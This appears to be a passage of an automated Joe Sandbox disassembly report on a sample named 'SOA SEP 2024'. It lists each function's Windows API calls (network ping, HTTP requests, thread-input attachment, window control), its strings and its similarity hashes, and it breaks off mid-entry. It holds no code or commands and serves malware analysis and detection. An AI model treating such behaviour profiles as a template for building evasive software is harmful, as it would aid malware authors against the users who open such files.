String ID: Failed to create object$Invalid parameter$NULL Pointer assignment
API String ID: 834269672-1287834457
Opcode ID: fd33a74fd202d2337af669261dba068919e6ce9b2e490d0ca5c96b4e6515bd25
Instruction ID: bd6a7c7227c10caefb5cbc62ce0a15cbb875cf2d80cf08afc848485738fee9cb
Opcode Fuzzy Hash: fd33a74fd202d2337af669261dba068919e6ce9b2e490d0ca5c96b4e6515bd25
Instruction Fuzzy Hash: 95619C71608301EFD720EF54C889BAABBE8EF89714F104919F9859B291D778ED44CB93

Function 007B8107 Relevance: 15.9, APIs: 8, Strings: 1, Instructions: 163networkfileCOMMON

Download Yara Rule

APIs

WSAStartup.WSOCK32(00000101,?), ref: 007B8168
inet_addr.WSOCK32(?,?,?), ref: 007B81AD
gethostbyname.WSOCK32(?), ref: 007B81B9
IcmpCreateFile.IPHLPAPI ref: 007B81C7
IcmpSendEcho.IPHLPAPI(?,?,?,00000005,00000000,?,00000029,00000FA0), ref: 007B8237
IcmpSendEcho.IPHLPAPI(00000000,00000000,?,00000005,00000000,?,00000029,00000FA0), ref: 007B824D
IcmpCloseHandle.IPHLPAPI(00000000), ref: 007B82C2
WSACleanup.WSOCK32 ref: 007B82C8

Strings

Ping, xrefs: 007B81EB

Memory Dump Source

Source File: 00000000.00000002.2102053386.0000000000761000.00000020.00000001.01000000.00000003.sdmp, Offset: 00760000, based on PE: true

Associated: 00000000.00000002.2102039912.0000000000760000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2102106470.00000000007ED000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2102106470.000000000080E000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2102149202.000000000081A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2102166761.0000000000824000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_760000_SOA SEP 2024.jbxd

Similarity

API ID: Icmp$EchoSend$CleanupCloseCreateFileHandleStartupgethostbynameinet_addr
String ID: Ping
API String ID: 1028309954-2246546115
Opcode ID: 2b3f59f081a962d5b90afc2cac20dea4d36556c565049adb1e69781c68da75ac
Instruction ID: 2e0c8758a8d2b16bcc4f86c43b4f45dd38fb8b3d1f61fa637421c4970ecccf28
Opcode Fuzzy Hash: 2b3f59f081a962d5b90afc2cac20dea4d36556c565049adb1e69781c68da75ac
Instruction Fuzzy Hash: 5A5172316046049FDB619F64CC89BAA77E8FF48710F048969F95ADB2A1DB78ED01CB42

Function 007B45C4 Relevance: 15.9, APIs: 7, Strings: 2, Instructions: 133networkCOMMON

Download Yara Rule

APIs

InternetConnectW.WININET(?,?,?,?,?,?,00000000,00000000), ref: 007B45FF
HttpOpenRequestW.WININET(00000000,00000000,?,00000000,00000000,00000000,?,00000000), ref: 007B462B
InternetQueryOptionW.WININET(00000000,0000001F,00000000,?), ref: 007B466D
InternetSetOptionW.WININET(00000000,0000001F,00000100,00000004), ref: 007B4682
HttpSendRequestW.WININET(00000000,00000000,00000000,00000000,00000000), ref: 007B468F
HttpQueryInfoW.WININET(00000000,00000005,?,?,00000000), ref: 007B46BF
InternetCloseHandle.WININET(00000000), ref: 007B4706

Part of subcall function 007B5052: GetLastError.KERNEL32(?,?,007B43CC,00000000,00000000,00000001), ref: 007B5067

Strings

, xrefs: 007B46B8
mmmmmm, xrefs: 007B45DE

Memory Dump Source

Source File: 00000000.00000002.2102053386.0000000000761000.00000020.00000001.01000000.00000003.sdmp, Offset: 00760000, based on PE: true

Associated: 00000000.00000002.2102039912.0000000000760000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2102106470.00000000007ED000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2102106470.000000000080E000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2102149202.000000000081A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2102166761.0000000000824000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_760000_SOA SEP 2024.jbxd

Similarity

API ID: Internet$Http$OptionQueryRequest$CloseConnectErrorHandleInfoLastOpenSend
String ID: $mmmmmm
API String ID: 1241431887-410873962
Opcode ID: 7160257d4812bbfc6e18c80ac6d43f8061ff2814e69a068609d3bf7638297107
Instruction ID: 418fa911b3e48cfbc97316288987b7ddf207703425959e450dd0d3baeef348b7
Opcode Fuzzy Hash: 7160257d4812bbfc6e18c80ac6d43f8061ff2814e69a068609d3bf7638297107
Instruction Fuzzy Hash: 7F416DB1501619BFEB119F64CC89FFB77ACFF09358F008116FA059A152DBB89D448BA4

Function 007AE389 Relevance: 15.8, APIs: 4, Strings: 5, Instructions: 97COMMON

Download Yara Rule

APIs

SetErrorMode.KERNEL32(00000001), ref: 007AE396
GetDiskFreeSpaceW.KERNEL32(?,?,?,?,?,00000002,00000001), ref: 007AE40C
GetLastError.KERNEL32 ref: 007AE416
SetErrorMode.KERNEL32(00000000,READY), ref: 007AE483

Strings

READY, xrefs: 007AE45C
READONLY, xrefs: 007AE44E
INVALID, xrefs: 007AE455
UNKNOWN, xrefs: 007AE43B
NOTREADY, xrefs: 007AE442

Memory Dump Source

Source File: 00000000.00000002.2102053386.0000000000761000.00000020.00000001.01000000.00000003.sdmp, Offset: 00760000, based on PE: true

Associated: 00000000.00000002.2102039912.0000000000760000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2102106470.00000000007ED000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2102106470.000000000080E000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2102149202.000000000081A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2102166761.0000000000824000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_760000_SOA SEP 2024.jbxd

Similarity

API ID: Error$Mode$DiskFreeLastSpace
String ID: INVALID$NOTREADY$READONLY$READY$UNKNOWN
API String ID: 4194297153-14809454
Opcode ID: 641fdf70fc5fd849596d377ce77ab3dabaa6fb90976be0f55b5d9298fa6330d2
Instruction ID: dfd068cc5c7b936f481eb233ecc1e4ea3f0277fe1584d5b1ddf4d427e9fca770
Opcode Fuzzy Hash: 641fdf70fc5fd849596d377ce77ab3dabaa6fb90976be0f55b5d9298fa6330d2
Instruction Fuzzy Hash: 30318375A00249DFDB11EB68D889ABDB7B8FF8E300F148115F906EB291D7789E41C791

Function 0079B907 Relevance: 15.8, APIs: 7, Strings: 2, Instructions: 81windowCOMMON

Download Yara Rule

APIs

SendMessageW.USER32(?,0000018C,000000FF,00000002), ref: 0079B98C
GetDlgCtrlID.USER32 ref: 0079B997
GetParent.USER32 ref: 0079B9B3
SendMessageW.USER32(00000000,?,00000111,?), ref: 0079B9B6
GetDlgCtrlID.USER32(?), ref: 0079B9BF
GetParent.USER32(?), ref: 0079B9DB
SendMessageW.USER32(00000000,?,?,00000111), ref: 0079B9DE

Strings

ListBox, xrefs: 0079B949
ComboBox, xrefs: 0079B911

Memory Dump Source

Source File: 00000000.00000002.2102053386.0000000000761000.00000020.00000001.01000000.00000003.sdmp, Offset: 00760000, based on PE: true

Associated: 00000000.00000002.2102039912.0000000000760000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2102106470.00000000007ED000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2102106470.000000000080E000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2102149202.000000000081A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2102166761.0000000000824000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_760000_SOA SEP 2024.jbxd

Similarity

API ID: MessageSend$CtrlParent
String ID: ComboBox$ListBox
API String ID: 1383977212-1403004172
Opcode ID: 2a67cf326b2052a2c933187b8a3f59a94958699f276b7d128a348f7bc09a4964
Instruction ID: 62ca6171641b66143ef631624dacbfbfa8b09fa31de4b6da8cdcad5aa98a23ba
Opcode Fuzzy Hash: 2a67cf326b2052a2c933187b8a3f59a94958699f276b7d128a348f7bc09a4964
Instruction Fuzzy Hash: AC21C4B4900104EFCF05ABA4EC85EFEB775EF49310B104115F96197291DB7D58159B20

Function 0079B9F0 Relevance: 15.8, APIs: 7, Strings: 2, Instructions: 80windowCOMMON

Download Yara Rule

APIs

SendMessageW.USER32(?,00000186,00000002,00000000), ref: 0079BA73
GetDlgCtrlID.USER32 ref: 0079BA7E
GetParent.USER32 ref: 0079BA9A
SendMessageW.USER32(00000000,?,00000111,?), ref: 0079BA9D
GetDlgCtrlID.USER32(?), ref: 0079BAA6
GetParent.USER32(?), ref: 0079BAC2
SendMessageW.USER32(00000000,?,?,00000111), ref: 0079BAC5

Strings

ListBox, xrefs: 0079BA32
ComboBox, xrefs: 0079B9FA

Memory Dump Source

Source File: 00000000.00000002.2102053386.0000000000761000.00000020.00000001.01000000.00000003.sdmp, Offset: 00760000, based on PE: true

Associated: 00000000.00000002.2102039912.0000000000760000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2102106470.00000000007ED000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2102106470.000000000080E000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2102149202.000000000081A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2102166761.0000000000824000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_760000_SOA SEP 2024.jbxd

Similarity

API ID: MessageSend$CtrlParent
String ID: ComboBox$ListBox
API String ID: 1383977212-1403004172
Opcode ID: cc083cb23789c43bf8773a4f0c3a928c7f07497b576cddfc3093b86e4fe0f81a
Instruction ID: 0857a19613624f7d852e319772c5f8c65432215b82715e748e705563331e6ad0
Opcode Fuzzy Hash: cc083cb23789c43bf8773a4f0c3a928c7f07497b576cddfc3093b86e4fe0f81a
Instruction Fuzzy Hash: 7421C5B4900104BFDF11ABA4DC85EFEB779EF49300F108015F95597291DB7D59299B24

Function 0079BAD7 Relevance: 15.8, APIs: 4, Strings: 5, Instructions: 71windowCOMMON

Download Yara Rule

APIs

GetParent.USER32 ref: 0079BAE3
GetClassNameW.USER32(00000000,?,00000100), ref: 0079BAF8
_wcscmp.LIBCMT ref: 0079BB0A
SendMessageW.USER32(00000000,00000111,0000702B,00000000), ref: 0079BB85

Strings

details, xrefs: 0079BB33
SHELLDLL_DefView, xrefs: 0079BB04
largeicons, xrefs: 0079BB19
smallicons, xrefs: 0079BB4D
list, xrefs: 0079BB67

Memory Dump Source

Source File: 00000000.00000002.2102053386.0000000000761000.00000020.00000001.01000000.00000003.sdmp, Offset: 00760000, based on PE: true

Associated: 00000000.00000002.2102039912.0000000000760000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2102106470.00000000007ED000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2102106470.000000000080E000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2102149202.000000000081A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2102166761.0000000000824000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_760000_SOA SEP 2024.jbxd

Similarity

API ID: ClassMessageNameParentSend_wcscmp
String ID: SHELLDLL_DefView$details$largeicons$list$smallicons
API String ID: 1704125052-3381328864
Opcode ID: 7126b3e9902d0ead27d426c08f700a9a5934ddc9afbc30f5b80f7e3d242373f5
Instruction ID: 8be84a89724fa521e20c0714cb0ec8d9a6601d6ec147888ce51b3a9a61792b9d
Opcode Fuzzy Hash: 7126b3e9902d0ead27d426c08f700a9a5934ddc9afbc30f5b80f7e3d242373f5
Instruction Fuzzy Hash: 921136B6248303FAFE207634FC0ACA6379CEF14324B204022FA14E40D5EBAD68614654

Function 007BB2A9 Relevance: 15.3, APIs: 10, Instructions: 324fileCOMMON

Download Yara Rule

APIs

VariantInit.OLEAUT32(?), ref: 007BB2D5
CoInitialize.OLE32(00000000), ref: 007BB302
CoUninitialize.OLE32 ref: 007BB30C
GetRunningObjectTable.OLE32(00000000,?), ref: 007BB40C
SetErrorMode.KERNEL32(00000001,00000029), ref: 007BB539
CoGetInstanceFromFile.OLE32(00000000,?,00000000,00000015,00000002), ref: 007BB56D
CoGetObject.OLE32(?,00000000,007ED91C,?), ref: 007BB590
SetErrorMode.KERNEL32(00000000), ref: 007BB5A3
SetErrorMode.KERNEL32(00000000,00000000,00000000,00000000,00000000), ref: 007BB623
VariantClear.OLEAUT32(007ED91C), ref: 007BB633

Memory Dump Source

Source File: 00000000.00000002.2102053386.0000000000761000.00000020.00000001.01000000.00000003.sdmp, Offset: 00760000, based on PE: true

Associated: 00000000.00000002.2102039912.0000000000760000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2102106470.00000000007ED000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2102106470.000000000080E000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2102149202.000000000081A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2102166761.0000000000824000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_760000_SOA SEP 2024.jbxd

Similarity

API ID: ErrorMode$ObjectVariant$ClearFileFromInitInitializeInstanceRunningTableUninitialize
String ID:
API String ID: 2395222682-0
Opcode ID: bd455ab090b4609cc3e904b88653e54d4a30580d6389a9f59c8da15e55e962a3
Instruction ID: 04d20b153625fca9c09dcfa80ed989613ac10f0b17a3d723e976e4de0396570f
Opcode Fuzzy Hash: bd455ab090b4609cc3e904b88653e54d4a30580d6389a9f59c8da15e55e962a3
Instruction Fuzzy Hash: 13C125B1608344AFC710DF65C888A6AB7E9FF88344F00491DF98ADB251DBB9ED05CB52

Function 0078ACB3 Relevance: 15.2, APIs: 10, Instructions: 219COMMON

Download Yara Rule

APIs

__lock.LIBCMT ref: 0078ACC1

Part of subcall function 00787CF4: __mtinitlocknum.LIBCMT ref: 00787D06
Part of subcall function 00787CF4: EnterCriticalSection.KERNEL32(00000000,?,00787ADD,0000000D), ref: 00787D1F

__calloc_crt.LIBCMT ref: 0078ACD2

Part of subcall function 00786986: __calloc_impl.LIBCMT ref: 00786995
Part of subcall function 00786986: Sleep.KERNEL32(00000000,000003BC,0077F507,?,0000000E), ref: 007869AC

@_EH4_CallFilterFunc@8.LIBCMT ref: 0078ACED
GetStartupInfoW.KERNEL32(?,00816E28,00000064,00785E91,00816C70,00000014), ref: 0078AD46
__calloc_crt.LIBCMT ref: 0078AD91
GetFileType.KERNEL32(00000001), ref: 0078ADD8
InitializeCriticalSectionAndSpinCount.KERNEL32(0000000D,00000FA0), ref: 0078AE11

Memory Dump Source

Source File: 00000000.00000002.2102053386.0000000000761000.00000020.00000001.01000000.00000003.sdmp, Offset: 00760000, based on PE: true

Associated: 00000000.00000002.2102039912.0000000000760000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2102106470.00000000007ED000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2102106470.000000000080E000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2102149202.000000000081A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2102166761.0000000000824000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_760000_SOA SEP 2024.jbxd

Similarity

API ID: CriticalSection__calloc_crt$CallCountEnterFileFilterFunc@8InfoInitializeSleepSpinStartupType__calloc_impl__lock__mtinitlocknum
String ID:
API String ID: 1426640281-0
Opcode ID: 82f8c4ae8502c0dde7b84ae9afd445eb0195a639c65e81d34eb4f1d8982f4edf
Instruction ID: 560e9ce0d557ec57769f16f2fdbc245396283825d02df9c452647295e5a35f80
Opcode Fuzzy Hash: 82f8c4ae8502c0dde7b84ae9afd445eb0195a639c65e81d34eb4f1d8982f4edf
Instruction Fuzzy Hash: 2A81D370945341EFEB24DF68C8855A9BBF0FF09320B24865ED4A6AB3D1D7389843CB56

Function 007A67E9 Relevance: 15.1, APIs: 10, Instructions: 107windowCOMMON

Download Yara Rule

APIs

__swprintf.LIBCMT ref: 007A67FD
__swprintf.LIBCMT ref: 007A680A

Part of subcall function 0078172B: __woutput_l.LIBCMT ref: 00781784

FindResourceW.KERNEL32(?,?,0000000E), ref: 007A6834
LoadResource.KERNEL32(?,00000000), ref: 007A6840
LockResource.KERNEL32(00000000), ref: 007A684D
FindResourceW.KERNEL32(?,?,00000003), ref: 007A686D
LoadResource.KERNEL32(?,00000000), ref: 007A687F
SizeofResource.KERNEL32(?,00000000), ref: 007A688E
LockResource.KERNEL32(?), ref: 007A689A
CreateIconFromResourceEx.USER32(?,?,00000001,00030000,00000000,00000000,00000000), ref: 007A68F9

Memory Dump Source

Source File: 00000000.00000002.2102053386.0000000000761000.00000020.00000001.01000000.00000003.sdmp, Offset: 00760000, based on PE: true

Associated: 00000000.00000002.2102039912.0000000000760000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2102106470.00000000007ED000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2102106470.000000000080E000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2102149202.000000000081A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2102166761.0000000000824000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_760000_SOA SEP 2024.jbxd

Similarity

API ID: Resource$FindLoadLock__swprintf$CreateFromIconSizeof__woutput_l
String ID:
API String ID: 1433390588-0
Opcode ID: 7c7d47f86b4929d399f14ad4b8419d926a1c12214e4d41683e9ba8c3666975df
Instruction ID: d5d5bdeddc94cbad1798c257908ddd5531b0e31d23ea3d2da2c967c3db1e9435
Opcode Fuzzy Hash: 7c7d47f86b4929d399f14ad4b8419d926a1c12214e4d41683e9ba8c3666975df
Instruction Fuzzy Hash: 2A31AE7190125AEBDB20AFA0DC89ABB7BACFF49340B148525FA02D6140E73CDD11DBA4

Function 007A4025 Relevance: 15.1, APIs: 10, Instructions: 88threadCOMMON

Download Yara Rule

APIs

GetCurrentThreadId.KERNEL32 ref: 007A4047
GetForegroundWindow.USER32(00000000,?,?,?,?,?,007A30A5,?,00000001), ref: 007A405B
GetWindowThreadProcessId.USER32(00000000), ref: 007A4062
AttachThreadInput.USER32(00000000,00000000,00000001,?,?,?,?,?,007A30A5,?,00000001), ref: 007A4071
GetWindowThreadProcessId.USER32(?,00000000), ref: 007A4083
AttachThreadInput.USER32(?,00000000,00000001,?,?,?,?,?,007A30A5,?,00000001), ref: 007A409C
AttachThreadInput.USER32(00000000,00000000,00000001,?,?,?,?,?,007A30A5,?,00000001), ref: 007A40AE
AttachThreadInput.USER32(00000000,00000000,?,?,?,?,?,007A30A5,?,00000001), ref: 007A40F3
AttachThreadInput.USER32(?,?,00000000,?,?,?,?,?,007A30A5,?,00000001), ref: 007A4108
AttachThreadInput.USER32(00000000,?,00000000,?,?,?,?,?,007A30A5,?,00000001), ref: 007A4113

Memory Dump Source

Source File: 00000000.00000002.2102053386.0000000000761000.00000020.00000001.01000000.00000003.sdmp, Offset: 00760000, based on PE: true

Associated: 00000000.00000002.2102039912.0000000000760000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2102106470.00000000007ED000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2102106470.000000000080E000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2102149202.000000000081A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2102166761.0000000000824000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_760000_SOA SEP 2024.jbxd

Similarity

API ID: Thread$AttachInput$Window$Process$CurrentForeground
String ID:
API String ID: 2156557900-0
Opcode ID: bc0c676018bd08dec13e18baee3438584953eb40641dabf619cbea9fecc762a8
Instruction ID: e7878b305b9eb653e787d8337b04af673b0bcc4f43212dbcc4140956fec77bcb
Opcode Fuzzy Hash: bc0c676018bd08dec13e18baee3438584953eb40641dabf619cbea9fecc762a8
Instruction Fuzzy Hash: 41319371500208AFDB31DF54DC89B6A77B9BBE5351F10C21AF904DA290CBFE9D818B64

Function 007DDD4A Relevance: 15.1, APIs: 10, Instructions: 59windowCOMMON

Download Yara Rule

APIs

GetSysColor.USER32(00000008), ref: 0077B496
SetTextColor.GDI32(?,000000FF), ref: 0077B4A0
SetBkMode.GDI32(?,00000001), ref: 0077B4B5
GetStockObject.GDI32(00000005), ref: 0077B4BD
GetClientRect.USER32(?), ref: 007DDD63
SendMessageW.USER32(?,00001328,00000000,?), ref: 007DDD7A
GetWindowDC.USER32(?), ref: 007DDD86
GetPixel.GDI32(00000000,?,?), ref: 007DDD95
ReleaseDC.USER32(?,00000000), ref: 007DDDA7
GetSysColor.USER32(00000005), ref: 007DDDC5

Memory Dump Source

Source File: 00000000.00000002.2102053386.0000000000761000.00000020.00000001.01000000.00000003.sdmp, Offset: 00760000, based on PE: true

Associated: 00000000.00000002.2102039912.0000000000760000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2102106470.00000000007ED000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2102106470.000000000080E000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2102149202.000000000081A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2102166761.0000000000824000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_760000_SOA SEP 2024.jbxd

Similarity

API ID: Color$ClientMessageModeObjectPixelRectReleaseSendStockTextWindow
String ID:
API String ID: 3430376129-0
Opcode ID: b2a71052ab0cd1fac0d4321965784db2b75a1d4a80fab83368629168ce353d31
Instruction ID: 69c0c09bdf16f76811b5c775d57c97a6ff1c741bdd8a29a1c667576246b44144
Opcode Fuzzy Hash: b2a71052ab0cd1fac0d4321965784db2b75a1d4a80fab83368629168ce353d31
Instruction Fuzzy Hash: A2117C31101285EFDF316FA4EC88BA93B71EB08365F11C225FA6A990E1DB7A0D51DB20

Function 0079CB82 Relevance: 14.2, APIs: 2, Strings: 6, Instructions: 239COMMON

Download Yara Rule

APIs

EnumChildWindows.USER32(?,0079CF50), ref: 0079CE90

Strings

TEXT, xrefs: 0079CDC7
NAME, xrefs: 0079CCC2
CLASS, xrefs: 0079CC10
INSTANCE, xrefs: 0079CD9E
CLASSNN, xrefs: 0079CC33
REGEXPCLASS, xrefs: 0079CC56

Memory Dump Source

Source File: 00000000.00000002.2102053386.0000000000761000.00000020.00000001.01000000.00000003.sdmp, Offset: 00760000, based on PE: true

Associated: 00000000.00000002.2102039912.0000000000760000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2102106470.00000000007ED000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2102106470.000000000080E000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2102149202.000000000081A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2102166761.0000000000824000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_760000_SOA SEP 2024.jbxd

Similarity

API ID: ChildEnumWindows
String ID: CLASS$CLASSNN$INSTANCE$NAME$REGEXPCLASS$TEXT
API String ID: 3555792229-1603158881
Opcode ID: 5a50c355698dfc52c1837e79f6cb1d1283605ea97ea7f0067aa03127e00ee526
Instruction ID: 87444a5d185c378f59189c770b95755cbba94852ac5fa207ce99b684b000fd8f
Opcode Fuzzy Hash: 5a50c355698dfc52c1837e79f6cb1d1283605ea97ea7f0067aa03127e00ee526
Instruction Fuzzy Hash: 4591A230A04106EBDF1ADFA0D485BEAFB79FF04340F508559E94AA7141DF38699ACBE0

Function 00763093 Relevance: 14.2, APIs: 7, Strings: 1, Instructions: 210COMMON

Download Yara Rule

APIs

mciSendStringW.WINMM(close all,00000000,00000000,00000000), ref: 007630DC
CoUninitialize.OLE32(?,00000000), ref: 00763181
UnregisterHotKey.USER32(?), ref: 007632A9
DestroyWindow.USER32(?), ref: 007D5079
FreeLibrary.KERNEL32(?), ref: 007D50F8
VirtualFree.KERNEL32(?,00000000,00008000), ref: 007D5125

Strings

close all, xrefs: 007630D7

Memory Dump Source

Source File: 00000000.00000002.2102053386.0000000000761000.00000020.00000001.01000000.00000003.sdmp, Offset: 00760000, based on PE: true

Associated: 00000000.00000002.2102039912.0000000000760000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2102106470.00000000007ED000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2102106470.000000000080E000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2102149202.000000000081A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2102166761.0000000000824000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_760000_SOA SEP 2024.jbxd

Similarity

API ID: Free$DestroyLibrarySendStringUninitializeUnregisterVirtualWindow
String ID: close all
API String ID: 469580280-3243417748
Opcode ID: 7cb429dd83f8955a315faf49a9a9c1227b4cc9815bedc0ace4df46362f501eb0
Instruction ID: aa8d07e411a876f7d8365106e95a6128bef1bc04ef757d353f120164b5db68eb
Opcode Fuzzy Hash: 7cb429dd83f8955a315faf49a9a9c1227b4cc9815bedc0ace4df46362f501eb0
Instruction Fuzzy Hash: 80912B74600246CFC719EF24C999A68F3B4FF15304F5482A9E90BA7262DF38AE56CF54

Function 0077CB8D Relevance: 14.2, APIs: 7, Strings: 1, Instructions: 185windowCOMMON

Download Yara Rule

APIs

SetWindowLongW.USER32(?,000000EB), ref: 0077CC15

Part of subcall function 0077CCCD: GetClientRect.USER32(?,?), ref: 0077CCF6
Part of subcall function 0077CCCD: GetWindowRect.USER32(?,?), ref: 0077CD37
Part of subcall function 0077CCCD: ScreenToClient.USER32(?,?), ref: 0077CD5F

GetDC.USER32 ref: 007DD137
SendMessageW.USER32(?,00000031,00000000,00000000), ref: 007DD14A
SelectObject.GDI32(00000000,00000000), ref: 007DD158
SelectObject.GDI32(00000000,00000000), ref: 007DD16D
ReleaseDC.USER32(?,00000000), ref: 007DD175
MoveWindow.USER32(?,?,?,?,?,?,?,00000031,00000000,00000000), ref: 007DD200

Strings

U, xrefs: 007DD0D5

Memory Dump Source

Source File: 00000000.00000002.2102053386.0000000000761000.00000020.00000001.01000000.00000003.sdmp, Offset: 00760000, based on PE: true

Associated: 00000000.00000002.2102039912.0000000000760000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2102106470.00000000007ED000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2102106470.000000000080E000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2102149202.000000000081A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2102166761.0000000000824000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_760000_SOA SEP 2024.jbxd

Similarity

API ID: Window$ClientObjectRectSelect$LongMessageMoveReleaseScreenSend
String ID: U
API String ID: 4009187628-3372436214
Opcode ID: 3a559c0262d24c18a1b42bef588a8d4e4ff415d1ba408ec3db221b29e4c1672c
Instruction ID: 943d7e7cb037e5a452cc0dbb4dc190f1a01857217d8d25b44219bc9fcea80f2b
Opcode Fuzzy Hash: 3a559c0262d24c18a1b42bef588a8d4e4ff415d1ba408ec3db221b29e4c1672c
Instruction Fuzzy Hash: 7971D030400209DFCF329F64CC85AEA7BB5FF59354F24826AED595A2A6C7399C41DF60

Function 007CECD4 Relevance: 14.1, APIs: 6, Strings: 2, Instructions: 149windowCOMMON

Download Yara Rule

APIs

Part of subcall function 0077B34E: GetWindowLongW.USER32(?,000000EB), ref: 0077B35F

Part of subcall function 0077B63C: GetCursorPos.USER32(000000FF), ref: 0077B64F
Part of subcall function 0077B63C: ScreenToClient.USER32(00000000,000000FF), ref: 0077B66C
Part of subcall function 0077B63C: GetAsyncKeyState.USER32(00000001), ref: 0077B691
Part of subcall function 0077B63C: GetAsyncKeyState.USER32(00000002), ref: 0077B69F

ImageList_DragLeave.COMCTL32(00000000,00000000,00000001,?,?,?), ref: 007CED3C
ImageList_EndDrag.COMCTL32 ref: 007CED42
ReleaseCapture.USER32 ref: 007CED48
SetWindowTextW.USER32(?,00000000), ref: 007CEDF0
SendMessageW.USER32(?,000000B1,00000000,000000FF), ref: 007CEE03
DefDlgProcW.USER32(?,00000202,?,?,00000000,00000001,?,?,?), ref: 007CEEDC

Strings

@GUI_DROPID, xrefs: 007CEE33
@GUI_DRAGFILE, xrefs: 007CEE77

Memory Dump Source

